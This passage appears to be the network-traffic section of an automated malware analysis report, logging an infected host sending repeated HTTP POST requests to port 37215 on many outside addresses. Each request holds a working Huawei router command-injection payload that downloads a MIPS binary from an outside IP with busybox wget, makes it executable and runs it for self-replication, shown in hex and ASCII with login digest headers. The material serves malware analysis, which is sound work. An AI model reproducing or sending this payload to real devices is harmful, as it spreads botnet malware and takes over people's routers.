6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          11192.168.2.1549564197.135.3.4737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.506824017 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          12192.168.2.1553224208.120.222.1137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.506824970 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          13192.168.2.1544110157.148.80.5237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.506824970 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          14192.168.2.1556058197.10.81.437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.506834030 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          15192.168.2.1549684135.255.104.16337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.506863117 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          16192.168.2.1558904157.0.25.15737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.506874084 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          17192.168.2.1533492204.176.244.9537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.506890059 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          18192.168.2.156087677.37.205.18637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.506953955 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          19192.168.2.1557650197.200.136.12237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.506957054 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          20192.168.2.154690441.41.3.9937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.506959915 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          21192.168.2.153501452.41.97.21037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.506977081 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
